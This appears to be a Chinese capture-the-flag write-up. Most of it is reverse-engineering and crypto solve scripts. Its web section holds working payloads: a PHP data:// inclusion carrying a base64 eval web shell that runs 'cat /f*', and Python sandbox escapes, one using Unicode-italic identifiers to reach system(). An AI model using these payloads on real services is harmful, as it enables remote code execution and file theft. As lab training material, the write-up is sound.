misc
AmazingGame
题目内容:
出题人们都好狠啊,题做累了不如来玩玩游戏吧,还有就是,安卓软件私有数据会放在哪?(游戏至少通过一个关卡才会有存档)
好不容易用鼠标打了一关,改了存档似乎没啥用,没仔细研究
/data/data
搜索一下关键字unlockedtracks
ez_jail
no {} no cpp?
感谢csdn
c/c++中<%%>可代替{}
void user_code() <%
std::cout << "Hello, World!";
%>
dm9pZCB1c2VyX2NvZGUoKSA8JQ0KICAgIHN0ZDo6Y291dCA8PCAiSGVsbG8sIFdvcmxkISI7DQolPg==
BGM坏了吗?
题目内容:
刚想听一篇推文,但是bgm吵死了,我忍了又忍,摈除杂音仔细听,up难道在拨号吗?(以flag{}形式提交)
剪出最后一段
DTMF
OSINT-MASTER
题目内容:
我重生了,上一世最后一刻我是在一架飞机上。
这一世,我拿着手上这张照片,下定决心,一定要找到之前坐过的那架航班!
flag格式:flag{航班号_照片拍摄时飞机经过的地级市}
示例:flag{YU8915_廊坊市}
图片中有时间信息和飞机注册号
re
011vm
题目内容:
欢迎来到混淆专场
d810反混淆器ollvm去平坦化
动调半天分析全是混淆,属于是学到什么是混淆了
tea
enc和key
#include <stdio.h>
#include <stdint.h>
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720, i; //这里的sum是0x9e3779b9*32后截取32位的结果,截取很重要。
uint32_t delta = 0x9e3779b9;
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
for (i = 0;i < 32;i++) {
v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
sum -= delta;
}
v[0] = v0;v[1] = v1;
}
int main()
{
uint64_t v[4] = { 0xB7E510C138B97E28, 0x5593BBD7B4B29FAE ,0x1671C6373C2E9B9E , 0x5116E5158F3A8CB5 };
uint32_t k[4] = { 0x11121314,0x22232425,0x33343536,0x41424344 };
printf("加密前的数据:%x %x\n", (uint32_t)v, *((uint32_t*)&v + 1)); //%u 以十进制形式输出无符号整数
for (int i = 0; i < 4; i++)
{
decrypt((uint32_t*)&v+2*i, k);
}
printf("加密前的数据:%x %x\n", (uint32_t)v, *((uint32_t*)&v + 1)); //%u 以十进制形式输出无符号整数
for (int i = 0; i < 32; i++)
{
printf("%c", *((char*)&v + i));
}
return 0;
}
PangBai 过家家(3)
题目内容:
PangBai 住院了,医生说他体内大量的丙酮酸羧化酶(PYC)基因被 DNA 内切酶所“解开”,导致丙酮酸难以羧化为草酰乙酸,从而阻止了糖异生和谷氨酸生成,导致神经递质分泌不足并引发昏厥症状。医生根据条斑紫菜叶状体中的 PyPYC 序列构建了能够通过 MCT4 转运蛋白、含 PYC 基因的病毒体对 PangBai 进行注射,两个系统时后,PangBai 体内葡萄糖和胰岛素水平恢复正常,相关二元反射均正常。医生和我说可以准备出院手续了。(以上内容不包含专业性医学建议或指导)
这题python3.12出的题
-
extremecoders-re/pyinstxtractor: PyInstaller Extractor (github.com)
-
zrax/pycdc: C++ python bytecode disassembler and decompiler (github.com)
搭配使用上面两个工具,使用最新版,第二个需cmake编译
exe->pyc
python .\pyinstxtractor.py .\NotNormalExe.exe
pyc(NotNormalExe.exe_extracted
中)->py
pycdc.exe -o .\NotNormalExe.py .\NotNormalExe.pyc
# Source Generated with Decompyle++
# File: NotNormalExe.pyc (Python 3.12)
import sys
print('Welcome to NewStar~')
print('Please input the flag:')
enc = [
40,
9,
22,
52,
15,
56,
66,
71,
111,
121,
90,
33,
18,
40,
3,
13,
80,
28,
65,
68,
83,
88,
34,
86,
5,
12,
35,
82,
67,
3,
17,
79]
key = 'NewStar2024'
input = input('> ')
if len(input) != len(enc):
print('Wrong flag, try again!')
sys.exit(0)
# WARNING: Decompyle incomplete
exp
enc = [
40, 9, 22, 52, 15, 56, 66, 71, 111, 121, 90, 33,
18, 40, 3, 13, 80, 28, 65, 68, 83, 88, 34, 86,
5, 12, 35, 82, 67, 3, 17, 79
]
key = 'NewStar2024'
flag = ''
# 通过循环使用 key 中的字符对 enc 进行解密
for i in range(len(enc)):
flag += chr(enc[i] ^ ord(key[i % len(key)]))
print("Decrypted flag:", flag)
simpleAndroid
jni
先用UseLess加密,再反转,再字节前后四位互换
换表base64
exp
data_1 = [178, 116, 69, 22, 71, 52, 149, 54, 23, 244, 67, 149, 3, 214, 51, 149, 198, 214, 51, 54, 167, 53, 230, 54, 150, 87, 67, 22, 150, 151, 230, 22]
def decrypt(data):
processed = []
for byte in data:
original_value = ((byte & 0x0F)<<4) | ((byte >> 4) & 0xFF)
processed.append(original_value)
length=len(processed)
for i in range(length//2):
processed[i], processed[length - i - 1] = processed[length - i - 1], processed[i]
result = ''.join(chr(b) for b in processed)
return result
def base64_decode(encoded_str):
CHAR_DATA = "BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/A"
output = []
i = 0
while i < len(encoded_str):
b1 = CHAR_DATA.index(encoded_str[i])
i += 1
# 如果到达字符串末尾
if i == len(encoded_str):
output.append(chr(b1 << 2))
break
# 获取 b2
b2 = CHAR_DATA.index(encoded_str[i])
i += 1
# 处理 padding
if i == len(encoded_str):
output.append(chr((b1 << 2) | (b2 >> 4)))
break
# 获取 b3
b3 = CHAR_DATA.index(encoded_str[i])
i += 1
# 获取 b4
b4 = CHAR_DATA.index(encoded_str[i])
i += 1
# 解码
output.append(chr((b1 << 2) | (b2 >> 4)))
output.append(chr(((b2 & 0x0F) << 4) | (b3 >> 2)))
output.append(chr(((b3 & 0x03) << 6) | b4))
return ''.join(output)
# 测试解密
decrypted_string = decrypt(data_1)
print("Decrypted String:", decrypted_string)
encoded_str = decrypted_string # 替换为你的 Base64 编码字符串
decoded_str = base64_decode(encoded_str)
print(decoded_str)
SMc_math
题目内容:
Simultaneous Multivariate Calculations——我才不会告诉你SMC其实是双关呢!
smc程序自改
对于encrypt地址后0x3D5字节进行异或0x3E
动调自改发现反编译失败,干脆手动改
from idaapi import*
addr=0x11E9
while addr!=0x11E9+0x3D6:
byte=get_byte(addr)^0x3E
print(hex(addr),byte)
patch_byte(addr,byte)
addr+=1
解密exp
from sympy import symbols, Eq, solve
import struct
v2, v3, v4, v5, v6, v7, v8 = symbols('v2 v3 v4 v5 v6 v7 v8')
eq1 = Eq(5 * (v2 + v3) + 4 * v4 + 6 * v5 + v6 + 9 * v8 + 2 * v7, 0xD5CC7D4FF)
eq2 = Eq(4 * v8 + 3 * v5 + 6 * v4 + 10 * v3 + 9 * v2 + 9 * v7 + 3 * v6, 0x102335844B)
eq3 = Eq(9 * v6 + 4 * (v5 + v4) + 5 * v3 + 4 * v2 + 3 * v8 + 10 * v7, 0xD55AEABB9)
eq4 = Eq(9 * v3 + 5 * v2 + 9 * v8 + 2 * (v4 + 2 * v5 + 5 * v6 + v7), 0xF89F6B7FA)
eq5 = Eq(5 * v6 + 9 * v5 + 7 * v2 + 2 * v3 + v4 + 3 * v8 + 9 * v7, 0xD5230B80B)
eq6 = Eq(8 * v8 + 6 * v5 + 10 * v4 + 5 * v3 + 6 * v2 + 3 * v7 + 9 * v6, 0x11E28ED873)
eq7 = Eq(v2 + 4 * (v4 + v3 + 2 * v5) + 9 * v6 + v7 + 3 * v8, 0xB353C03E1)
solution = solve([eq1, eq2, eq3, eq4, eq5, eq6, eq7], (v2, v3, v4, v5, v6, v7, v8))
print(solution)
result_string = ""
for key in solution:
result_string += struct.pack("<I", solution[key]).decode() # ">I"表示大端32位无符号整数
print("Decrypted string:", result_string)
取啥名好呢?
请看CSAPP。这题解法很多,解出来就行了(没有答疑什么的,直接去看书)
setjmp类似一个存档点,对应longjmp为读档点
signal用于接受异常信号,类似于支线任务,触发就会跳转执行
信号 | 值 | 处理动作 | 发出信号的原因 |
---|---|---|---|
SIGHUP | 1 | A | 终端挂起或者控制进程终止 |
SIGINT | 2 | A | 键盘中断(如 break 键被按下) |
SIGQUIT | 3 | C | 键盘的退出键被按下 |
SIGILL | 4 | C | 非法指令 |
SIGABRT | 6 | C | 由 abort(3) 发出的退出指令 |
SIGFPE | 8 | C | 浮点异常 |
SIGKILL | 9 | AEF | Kill 信号 |
SIGSEGV | 11 | C | 无效的内存引用 |
SIGPIPE | 13 | A | 管道破裂: 写一个没有读端口的管道 |
SIGALRM | 14 | A | 由 alarm(2) 发出的信号 |
SIGTERM | 15 | A | 终止信号 |
SIGUSR1 | 30, 10, 16 | A | 用户自定义信号 1 |
SIGUSR2 | 31, 12, 17 | A | 用户自定义信号 2 |
SIGCHLD | 20, 17, 18 | B | 子进程结束信号 |
SIGCONT | 19, 18, 25 | 进程继续(曾被停止的进程) | |
SIGSTOP | 17, 19, 23 | DEF | 终止进程 |
SIGTSTP | 18, 20, 24 | D | 控制终端(tty)上按下停止键 |
SIGTTIN | 21, 21, 26 | D | 后台进程企图从控制终端读 |
SIGTTOU | 22, 22, 27 | D | 后台进程企图从控制终端写 |
段错误,对应signal值11
跳转func2,读档回溯到switch,env被设为2
非法指令
进入handler读档
进入case 1,没有触发异常,break
除0,signal8捕获
进入func1,与除0构成一个循环,对1-22进行加密
exp
enc=[0x4f,0x54,0x48,0x53,0x60,0x45,0x37,0x1a,0x28,0x41,0x26,0x16,0x3b,0x45,0x14,0x47,0xe,0xc,0x70,0x3b,0x3c,0x3d,0x70]
for i in range(1,23):
enc[i]^=i
for i in range(23):
enc[i] -= 0xE9
enc[i] &= 0xff
print(chr(enc[i]),end="")
flowering_shrubs
三处加密,也算是分组内循环加密(不知道怎么叫)
判断位置
key对密文的分组加密顺序为1-2-9-4-3-7-5-6-8-10
fake_key="uarefirst."
enc=[0x54,0xf4,0x20,0x47,0xfc,0xc4,0x93,0xe6,0x39,0xe0,0x6e,0x0,0xa5,0x6e,0xaa,0x9f,0x7a,0xa1,0x66,0x39,0x76,0xb7,0x67,0x57,0x3d,0x95,0x61,0x22,0x55,0xc9,0x3b,0x4e,0x4f,0xe8,0x66,0x8,0x3d,0x50,0x43,0x3e]
key=[fake_key[0],fake_key[1],fake_key[4],fake_key[3],fake_key[6],fake_key[7],fake_key[5],fake_key[8],fake_key[2],fake_key[9]]
for i in range(10):
enc[4*i] ^= enc[4*i+3]
enc[4*i+3] ^= enc[4*i+2]
enc[4*i+2] += ord(key[i])
enc[4*i+2] &= 0xff
enc[4*i+2] ^= enc[4*i+1]
enc[4*i+1] -= ord(key[i])
enc[4*i+1] ^= enc[4*i]
enc[4*i] ^= ord(key[i])
for i in enc:
print(chr(i),end="")
这题也是做的挺坎坷,一开始动调分析完加密逻辑后解密怎么都不对,后来试过四字符爆破,密钥爆破,patch排除各种原因,没想到是加密顺序的问题,可能是rand随机数控制顺序还是太菜了
web
Include Me
题目内容:
兄弟包一下
<?php
highlight_file(__FILE__);
function waf(){
if(preg_match("/<|\?|php|>|echo|filter|flag|system|file|%|&|=|`|eval/i",$_GET['me'])){
die("兄弟你别包");
};
}
if(isset($_GET['phpinfo'])){
phpinfo();
}
//兄弟你知道了吗?
if(!isset($_GET['iknow'])){
header("Refresh: 5;url=https://cn.bing.com/search?q=php%E4%BC%AA%E5%8D%8F%E8%AE%AE");
}
waf();
include $_GET['me'];
echo "兄弟你好香";
?>
data://封装协议直接梭
?iknow&me=data://text/plain;base64,PD9waHAgQGV2YWwoJF9HRVRbY21kXSk7Pz4&cmd=system('cat /f*');
臭皮踩踩背
题目内容:
老爷爷,为了给你踩背,我一定要从这里逃出去!!!
print('你被豌豆关在一个监狱里,,,,,,')
print('豌豆百密一疏,不小心遗漏了一些东西,,,')
print('''def ev4l(*args):\n\tprint(secret)\ninp = input("> ")\nf = lambda: None\nprint(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))''')
print('能不能逃出去给豌豆踩踩背就看你自己了,臭皮,,')
def ev4l(*args):
print(secret)
secret = '你已经拿到了钥匙,但是打开错了门,好好想想,还有什么东西是你没有理解透的?'
inp = input("> ")
f = lambda: None
if "f.__globals__['__builtins__'].eval" in inp:
f.__globals__['__builtins__'].eval = ev4l
else:
f.__globals__['__builtins__'].eval = eval
try:
print(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))
except Exception as e:
print(f"Error: {e}")
臭皮的计算机
和上题差不多,unicode绕过
[].__𝘤𝘭𝘢𝘴𝘴__.__𝘣𝘢𝘴𝘦__.__𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴__()[-4].𝘤𝘭𝘰𝘴𝘦.__𝘨𝘭𝘰𝘣𝘢𝘭𝘴__[𝘤𝘩𝘳(115)+𝘤𝘩𝘳(121)+𝘤𝘩𝘳(115)+𝘤𝘩𝘳(116)+𝘤𝘩𝘳(101)+𝘤𝘩𝘳(109)](𝘤𝘩𝘳(99)+𝘤𝘩𝘳(97)+𝘤𝘩𝘳(116)+' /'+𝘤𝘩𝘳(102)+'*')
Crypto
故事新编1
题目内容:
我亦曾无敌人间三百年
from hashlib import md5
zen1 = '''
BEAUTIFUL IS BETTER THAN UGLY.
EXPLICIT IS BETTER THAN IMPLICIT.
SIMPLE IS BETTER THAN COMPLEX.
COMPLEX IS BETTER THAN COMPLICATED.
FLAT IS BETTER THAN NESTED.
SPARSE IS BETTER THAN DENSE.
FLAGA IS VEGENERE
READABILITY COUNTS.
SPECIAL CASES AREN'T SPECIAL ENOUGH TO BREAK THE RULES.
ALTHOUGH PRACTICALITY BEATS PURITY.
ERRORS SHOULD NEVER PASS SILENTLY.
UNLESS EXPLICITLY SILENCED.
'''
key1 = "subtitution"
def enc1(plaintext, key):
def shift_char(c, k):
return chr(((ord(c) - ord('A') + (ord(k) - ord('A'))) % 26) + ord('A'))
plaintext = plaintext.upper()
key = key.upper()
ciphertext = []
key_index = 0
for char in plaintext:
if char.isalpha():
ciphertext.append(shift_char(char, key[key_index % len(key)]))
key_index += 1
else:
ciphertext.append(char)
return ''.join(ciphertext)
print('enc = \'\'\'' + enc1(zen1, key1)+'\'\'\'')
flag = b'flag{'+md5(zen1.encode()).hexdigest().encode()+b'}'
print(flag)
#----------------------------------------------
enc = '''
TYBNBBZNT WF TYUMMK NAIB HYFZ.
XFIFBKWG AM CXBMYK BVNF CNITBWBB.
GVEJMX QL VXBHRJ NITV VIFXZRP.
WPFXEYQ QG OWNUXZ MBTV QBEJMBKTNXL.
TYSN JL JXNMMF GZUO GMLNXL.
GCSLTX QL VXBHRJ NITV WYGAS.
SDUHT QL PXOSAWLF
KMTXTJWYANZ VWNHMA.
GCWWJTT VULMG NJYO'M AIYVQOY WHPNOA NH JFRSE UAM KOEMG.
NDNIHCZB IZOPLCDTTBNR JSNLM QNZBNR.
MFEGLT LPHOEL BRNYS IILM LQZRFNMR.
CGFXAG RPJMBKBNEG GVDYOVMW.
'''
故事新编2
from hashlib import md5
zen2 = '''
IN THE FACE OF AMBIGUITY, REFUSE THE TEMPTATION TO GUESS.
THERE SHOULD BE ONE-- AND PREFERABLY ONLY ONE --OBVIOUS WAY TO DO IT.
ALTHOUGH THAT WAY MAY NOT BE OBVIOUS AT FIRST UNLESS YOU'RE DUTCH.
NOW IS BETTER THAN NEVER.
ALTHOUGH NEVER IS OFTEN BETTER THAN RIGHT NOW.
IF THE IMPLEMENTATION IS HARD TO EXPLAIN, IT'S A BAD IDEA.
IF THE IMPLEMENTATION IS EASY TO EXPLAIN, IT MAY BE A GOOD IDEA.
'''
key2 = "supersubtitution"
dict1 = {'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4,
'F': 5, 'G': 6, 'H': 7, 'I': 8, 'J': 9,
'K': 10, 'L': 11, 'M': 12, 'N': 13, 'O': 14,
'P': 15, 'Q': 16, 'R': 17, 'S': 18, 'T': 19,
'U': 20, 'V': 21, 'W': 22, 'X': 23, 'Y': 24, 'Z': 25}
dict2 = {0: 'A', 1: 'B', 2: 'C', 3: 'D', 4: 'E',
5: 'F', 6: 'G', 7: 'H', 8: 'I', 9: 'J',
10: 'K', 11: 'L', 12: 'M', 13: 'N', 14: 'O',
15: 'P', 16: 'Q', 17: 'R', 18: 'S', 19: 'T',
20: 'U', 21: 'V', 22: 'W', 23: 'X', 24: 'Y', 25: 'Z'}
def generate_key(message, key):
for i in range(len(message)):
if message[i].isalpha() == False:
pass
else:
key += message[i]
return key
def enc2(message, key):
message = message.upper()
key = key.upper()
key_new = generate_key(message, key)
cipher_text = ''
i = 0
for letter in message:
if letter.isalpha():
x = (dict1[letter]+dict1[key_new[i]]) % 26
i += 1
cipher_text += dict2[x]
else:
cipher_text += letter
return cipher_text
print('enc = \'\'\'' + enc2(zen2, key2)+'\'\'\'')
flag = b'flag{'+md5(zen2.encode()).hexdigest().encode()+b'}'
print(flag)
#----------------------------------------------
enc = '''
AH ILV XUDX WY UFJWTCVMF, VJFWWS YHQ UMSJBTRZSS NG KNLWL.
XTTKE LPCHER HY SFW-- TUH GVWMSLLEMC CAPY BQT --FFAMFUT HYM GZ BC VX.
OMOPCOYD TFTH ZOG FAJ GVH VK VUCIHQS YF FGEGM VRZFNA MIM'RX ICKUA.
HBH MK TCHNVV WBTP URJAZ.
SMXAHYXA UEIRV DW FFEXU PYZARV OLRV JWLAX APA.
BY XYX PMCCMSLGGOPQTG PW PMGO XA IKILTQB, VB'K H BRG BRIX.
XQ TPR QFHLFMHVWETQTG PW MMHJ XA IKILTQB, VB EEY TC T USLS TDMN.
'''